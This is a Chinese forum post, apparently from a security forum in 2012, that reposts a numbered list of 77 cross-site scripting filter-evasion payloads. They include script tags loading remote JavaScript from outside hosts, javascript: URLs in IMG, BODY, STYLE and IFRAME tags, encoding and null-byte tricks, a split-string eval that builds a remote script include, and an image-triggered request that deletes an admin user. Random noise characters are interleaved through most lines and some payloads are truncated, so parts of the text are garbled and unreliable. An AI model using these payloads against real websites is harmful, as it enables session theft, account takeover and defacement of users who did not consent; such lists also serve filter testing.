貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。% Y1 h- y/ A% F% T0 X1 T. ?
4 C/ @5 w5 C! _( B (1)普通的XSS JavaScript注入
: I! a$ _- B9 f, r: @ <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 M3 D( m- {# W' y% Z& l" C/ f, y3 q# Q" t2 o: Q' T' s
(2)IMG标签XSS使用JavaScript命令1 X4 D' A3 m( B; k6 y; O# |. _1 l0 O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; k; \, d. L+ s3 k* y* h4 }- S2 B
5 t; V1 n0 R% E( i* m0 `
(3)IMG标签无分号无引号
+ r' f2 x7 ^6 p% O# N <IMG SRC=javascript:alert(‘XSS’)>; N* ^$ t$ a1 O& E! m8 [' ^
. {$ f }2 O' y$ J8 R% N
(4)IMG标签大小写不敏感4 ?% s# x8 H7 Z, P; j, s
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ H; h! ?. W5 z+ C% z
1 H/ o+ L# |! ~. Y% H
(5)HTML编码(必须有分号)
2 A9 F$ a. {. p' w$ u5 F <IMG SRC=javascript:alert(“XSS”)>7 q: G) ]* z3 y9 \/ }' _9 Y
0 l8 N2 n' K, l7 h6 y6 Z
(6)修正缺陷IMG标签( ~" |& ?! q# E9 Y9 E
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”># b1 H# p: Q& A" [& c. b
# n w4 ?% |) G+ @
(7)formCharCode标签(计算器)
/ N( R% P5 x+ t) c5 s <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
/ H1 X Z0 k3 F6 r. V" ~# [
8 Q! X+ `! W- k/ I, x: j (8)UTF-8的Unicode编码(计算器)
. t" c9 [+ g0 }) s <IMG SRC=jav..省略..S')>' v( ? v4 X8 z: F+ y/ Z) v' p
* w( [; u& B& ]. x6 r- @
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)' a7 |. ]4 `$ `3 K0 X+ u
<IMG SRC=jav..省略..S')>
" x; {& g' n I }( v" p9 h0 n( U. ]& ?
(10)十六进制编码也是没有分号(计算器); }: h! D* b! L( e
<IMG SRC=java..省略..XSS')>
! F& X: h: z: A; {$ O8 e% i! I
1 ~% s) `- v# O% W; N5 d (11)嵌入式标签,将Javascript分开, t$ b& |, D& _5 }& v$ p, F* U( d
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 M7 T* H/ W; N) S3 _2 C# R
# r/ t' n$ L) l) o n (12)嵌入式编码标签,将Javascript分开0 ~0 B, T# w! V4 P
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% a3 U) A. S/ V0 @1 t# l. a; x3 f$ w, q& C( D
(13)嵌入式换行符8 u+ ? ~6 }* C* V. V
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# M: w+ w8 j. F( Q7 \1 `! C6 ?6 T- d. d# L
(14)嵌入式回车4 a( u4 G) k6 c9 G
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ O3 M( C+ Q E" X8 }. E3 _# Z& m
(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 z, }( `) H- h
<IMG SRC=”javascript:alert(‘XSS‘)”>
, C q9 _- _- U k" J0 v& [
1 a4 v+ R3 E# j. `0 f; v (16)解决限制字符(要求同页面)- `% ^3 x8 ^1 p2 F# y
<script>z=’document.’</script>
2 Z6 D" t1 c: I' W <script>z=z+’write(“‘</script>
! J9 j6 Q2 R7 J& z3 D: e1 ~$ { <script>z=z+’<script’</script>
2 v! R% Z2 r. i5 r! L <script>z=z+’ src=ht’</script>
9 m& B/ V! E0 m8 ` <script>z=z+’tp://ww’</script>
6 B% C# A% Y, g" N; G4 T6 a S; Q <script>z=z+’w.shell’</script>
, z. h1 V$ }* I: r7 y5 ]$ z <script>z=z+’.net/1.’</script>
9 q$ \* W( K9 {& W <script>z=z+’js></sc’</script>
) |3 F s) \! B' O; l <script>z=z+’ript>”)’</script>
) q8 ?/ h7 c1 Q( ?3 N2 g <script>eval_r(z)</script>
# j4 S$ R2 L% ?2 L) q7 [1 r/ a- d7 M7 H9 u$ v! f0 {7 \' A
(17)空字符 a6 o6 N2 n% h, U( {4 R
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' }2 `+ [' s* ^2 G ?$ S; y
0 Y1 a/ w9 L6 L: x* q: | (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
9 E6 x& K9 L# d: } perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out1 D6 U% d2 K- r* G1 U9 G
: z- g% x7 ^# G* B# } (19)Spaces和meta前的IMG标签
( ?( p" I! ?% A$ z5 F9 ~" X <IMG SRC=” � javascript:alert(‘XSS’);”>
0 e( _1 h3 Q. \3 U6 D1 E( q- t8 z% G- }, ^" B
(20)Non-alpha-non-digit XSS
! N B: t. |% n <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# C. S7 V B, c% @% P5 O/ j1 S6 y% d: x) _3 w% v+ I# V
(21)Non-alpha-non-digit XSS to 2
5 m$ b8 e( S [: ? <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: L2 U+ j% V5 R. s* _% K: I2 e8 D* N- G( I$ c) `
(22)Non-alpha-non-digit XSS to 3
' a* Y6 `" |) |# @ N/ w+ s. E2 J <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 j# U7 L2 v, z: Y4 h" @
8 @1 u% U6 g' q3 A5 [9 t0 D6 O& o (23)双开括号
6 S- w: c3 L* e& { <<SCRIPT>alert(“XSS”);//<</SCRIPT>( T6 g. e, @6 l1 ^5 \$ ]: z
/ k" I% u4 ^: _" A$ H# k (24)无结束脚本标记(仅火狐等浏览器). \5 {* L4 G& k$ W
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" Z9 ~4 U- a. B' j' Q% n# A
! B, n( G0 x+ H# N (25)无结束脚本标记29 U6 J, ^! h8 I6 o
<SCRIPT SRC=//3w.org/XSS/xss.js>; v8 `& L) v% F. Z3 R1 @
9 u4 O% c1 G7 b (26)半开的HTML/JavaScript XSS
+ Z7 S" N7 j5 Y. S <IMG SRC=”javascript:alert(‘XSS’)”% m( n: C' x0 C' A2 a) Y9 B$ m4 P
2 z$ |/ n ? @% W6 L" @ (27)双开角括号
& A1 v. N" ^1 ~% @# z1 q/ B, T3 ? <iframe src=http://3w.org/XSS.html <$ l y8 X% T0 M7 \6 O
' x' C5 ~1 K+ I5 X5 T* R
(28)无单引号 双引号 分号
; g* C% S, W8 @1 | <SCRIPT>a=/XSS/
/ j6 [% S0 i% n( {+ L. h. d alert(a.source)</SCRIPT>8 q1 l, X; I$ q3 a
% f" X `% \9 K. ~ (29)换码过滤的JavaScript
2 M8 S5 d [& W$ N9 T# I \”;alert(‘XSS’);//
0 `8 |" P3 ~ [. c, V
. i$ V. ^- X8 [7 W (30)结束Title标签- t' s# m5 l2 G& l; q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' f- b, A2 o% ~6 Y9 [
& h, F- b! Y, w y1 j8 C
(31)Input Image0 A" o. B& v6 G
<INPUT SRC=”javascript:alert(‘XSS’);”>
7 f/ n( M& _# w
% b8 v' E0 K) c (32)BODY Image, U5 c* u3 f. V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. G1 G/ ~ c4 O: H* @
q, a0 p; e, g$ D h (33)BODY标签
% ~# E6 S9 [ n. D- ]2 P/ } <BODY(‘XSS’)>' J! V }7 V) Y' S `
' i' F0 c: R! n$ _ (34)IMG Dynsrc/ E1 Z/ i1 A5 P5 ?
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
, k3 t i! B2 t2 _6 R/ ?/ x( M" @8 D6 ], K K% ~6 g' Z2 y) Z
(35)IMG Lowsrc' @. ^/ M5 i. H9 f; [3 P3 G
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
* t, N# b( m0 Y5 H) h% \( p4 k2 y2 j/ _1 y. D, D; M
(36)BGSOUND
- U& b& ~; L# Y! `) a+ x, g) k <BGSOUND SRC=”javascript:alert(‘XSS’);”>
! H* T) S2 q6 w; t% g9 c* `' X+ c; S: {9 o5 l# v& ^- I% b
(37)STYLE sheet
2 N8 J" f5 T3 l <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 y8 `, F0 C+ W; @% {7 Y' m9 x [" N
1 {& m V3 B- B1 W& ~ (38)远程样式表
+ i+ x( p$ ]/ |5 I2 B" H <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>% q0 B4 D$ a/ {
- z/ s7 p1 D( [# U. ^( Z0 b, G" T7 T) r (39)List-style-image(列表式)
: S/ p8 x3 q% O) T$ c/ I <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* u5 @$ U( x4 K8 h) j# o5 U: i: f5 m! i# H6 v* }- a7 j9 \
(40)IMG VBscript5 l% Y" W7 q$ P3 T$ H/ P: l; |
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS' e6 o9 ]3 o) R: P
* {' n2 m2 R. a$ [! u6 e( b( W
(41)META链接url8 d" I# n7 h" G
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
w4 h: t7 m6 F9 l$ \' g/ |
; a5 ^5 Q8 G3 V& ^3 M% z (42)Iframe0 p& V) u3 Q. \- S4 ~: `5 |* m$ w
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>: W1 u! \3 D7 }, E6 Q% q# A
* i& l' }4 [. h8 L, a) o5 U% x (43)Frame
! h4 Z5 Q W K& x9 M4 w' | <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>- F W/ ~: o X0 O6 G- B8 H8 Y
( M2 p; Y# L: k% s& L. V2 o: i
(44)Table$ |3 V* Y' s/ F' x8 V/ Q4 g, N+ m' O
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>4 k N7 Q' p& P- y1 t
0 Z; c( N1 n+ o) N% c2 z" _% h- K. B
(45)TD
G3 x" Q( M, J/ W4 [7 z <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( n2 P- {) v6 ~& I4 [8 R
) W: p- ], V6 B! K6 V (46)DIV background-image
! ` U) `. V: K0 [ M- s( D* Z) z <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># G" | W, W7 b. X
G. G2 }3 j. w# o, V3 w
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" D) {& ^! P, j6 V. R! }, @
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
5 V/ J" P: w3 D3 V4 D. D
3 y; ]& S$ w | (48)DIV expression
# {7 q# x0 C8 a+ [ <DIV STYLE=”width: expression_r(alert(‘XSS’));”>! Y0 l" L+ l. `' W
6 K5 I0 g% I) ?9 J9 }4 q
(49)STYLE属性分拆表达
7 G+ ~: f' y8 S, N$ j! l" ^6 w <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: d6 Y% {0 l" e, A9 f! C5 J4 l/ o( j6 N+ v' V' t
(50)匿名STYLE(组成:开角号和一个字母开头)
! c5 y5 f1 t% Q5 e Z. _. r! J <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: j# k3 q% ^' `5 I
) L$ p+ m# T& B2 h1 U3 c' u" j (51)STYLE background-image
7 j4 s/ K! ]- ? <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
0 ~0 J) m% d& i* q: W4 p" z: Z% x- P# t& m9 l. Q' \' `6 N. W$ q
(52)IMG STYLE方式
% Z- T9 U1 t3 L" ^' J- { exppression(alert(“XSS”))’>
7 H9 E( `% ]; k0 u7 q5 }$ g' S& C1 b- Z; o( w0 X
(53)STYLE background
8 G# m, t. C; r$ t9 q& L. G <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>6 e9 q, i6 e8 M6 _6 K
) x9 I/ U/ X3 J% l3 u; B (54)BASE
! E1 }2 y' v( @, i <BASE HREF=”javascript:alert(‘XSS’);//”>! b5 F3 _% M4 Y8 E
- X8 \: [, L7 m, ]( k/ Z (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 K" x6 Q' y7 ^' d( F! c8 O P <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: ~; e, R0 I5 g! P5 G# `
+ ]( I/ i k, ]/ b8 {% y3 d
(56)在flash中使用ActionScrpt可以混进你XSS的代码+ l* i0 @) \" j0 J {
a=”get”;
4 a5 ~2 u$ g; b' b0 N1 |% O b=”URL(\”";1 I' |& t" }9 @1 q6 I' \
c=”javascript:”;
1 j& C8 x8 Q9 s; u( g2 z d=”alert(‘XSS’);\”)”;
0 g/ y5 L6 e; T/ [+ g% ?* V; ~ eval_r(a+b+c+d);
# |% c c0 E* A% {4 {# B7 i, [4 _, m: s* n' `8 j- H% w
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上3 ^/ f0 s- |0 l2 l" z# U5 ]
<HTML xmlns:xss>
( G U; u# Q/ j# ?8 Z" ~; Q <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> P$ w# |( F. F+ i h5 q% @' v
<xss:xss>XSS</xss:xss>
O* O& G( }* f! U A3 C; n# g9 a z </HTML>
M9 l( x4 q+ {1 Q# g/ C) O
. }5 K* a" Z5 }2 ?+ Z9 y# z4 J (58)如果过滤了你的JS你可以在图片里添加JS代码来利用' _% T9 H, s) n1 {: V
<SCRIPT SRC=””></SCRIPT>
' v; H: ^* t3 B4 h; p U4 y# I2 V/ O/ U4 y
(59)IMG嵌入式命令,可执行任意命令) M+ Q9 U( `; q0 |; [# l% S
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# q' N, ~9 G: ]+ V
+ N, o- C- a M1 z (60)IMG嵌入式命令(a.jpg在同服务器)8 D% x9 b$ }, S/ q# I- ]
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
! o& R) ^4 J2 a" O- Y6 Z+ \+ D
7 I5 q; U! ~. B8 _( d (61)绕符号过滤# \2 I: r0 e% ]$ F( t: C
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>" W" I6 U+ G- x
8 C& n. L( f) V
(62)
/ d! m- ?$ O3 e! E+ i9 W% B b k( ?% { <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
& m2 ?6 F' ?3 q" O" n* n
3 A0 l4 @, R" } (63)
: _ W+ _1 J( O <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' s: D2 b. z+ [1 v
8 t( U. w* [8 f: u; m1 y3 N (64)
4 O( }, ^9 Q: z. s3 g. ]7 K <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
* C# D8 o! M$ v1 W+ f" T8 e: c( u
L; T9 v* i# [6 _" x$ c (65)
# ?( j0 r: p0 @ <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
1 @2 S" r1 P0 U7 {% ~5 V% _$ K2 O# j- q8 ^& f
(66)
, n5 Q, t! o/ u% L+ B! X7 i# W <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>- O+ j) n! G% |; i! q# a! i7 a
6 b+ u. q# }) k/ T0 [4 p2 ` (67)
+ l& }* N0 z& I$ Q3 N4 R; r: M <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
1 I" X% @6 h, Q2 J8 O4 x7 x0 x* B
6 E! X- `9 d- y" @& K# Z' S (68)URL绕行* m3 I- M1 s! ?$ K, w
<A HREF=”http://127.0.0.1/”>XSS</A>
' ]$ @0 i+ B U/ r& e+ v, k; Z$ T2 P0 }
(69)URL编码
1 j k$ d: p- U. F7 Q( P( n <A HREF=”http://3w.org”>XSS</A> |! S' i* ^+ h b1 c: C
2 C! t0 k) k' a+ ^ (70)IP十进制( ~) l% L; d. N$ @% z
<A HREF=”http://3232235521″>XSS</A>
9 H& [# Q' D# c4 B2 f6 @$ H4 f) I0 F3 M2 {; \; T9 y
(71)IP十六进制% d1 ?9 O7 o9 a3 o3 K
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>' d% R5 q+ ~2 d! s& I( Z
: o. t+ c7 K/ H; A! J$ I (72)IP八进制
# R; b+ m$ z+ z3 `2 E <A HREF=”http://0300.0250.0000.0001″>XSS</A>+ X, J- c3 L" |0 y" |( c! ^
5 e0 G3 U3 b4 \4 Y% [
(73)混合编码- K5 N) v6 R+ | N1 d; N$ {3 H
<A HREF=”h
* D1 r ^3 n" p& a tt p://6 6.000146.0×7.147/”">XSS</A>
) s. A7 Z7 M, |; I! G* }0 y* G' i$ ?, y
(74)节省[http:]
* Q% _& f& M5 R <A HREF=”//www.google.com/”>XSS</A>2 y( e! k9 r n2 B7 |- j
& U$ z0 V+ B, N" `9 h
(75)节省[www]1 t7 Z$ _3 B+ P6 o* }4 ?0 M
<A HREF=”http://google.com/”>XSS</A>
2 j; T2 S) \) n! @+ l9 w. o" E: ]/ e
(76)绝对点绝对DNS0 n9 _: S9 j! }4 m( O) H- A# \8 n
<A HREF=”http://www.google.com./”>XSS</A>
6 n/ c: q" G3 H0 n& P( T5 V
Y' \) C' T; @6 E7 ~* M: w" Y (77)javascript链接- P* |7 @( F7 s5 f4 A
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对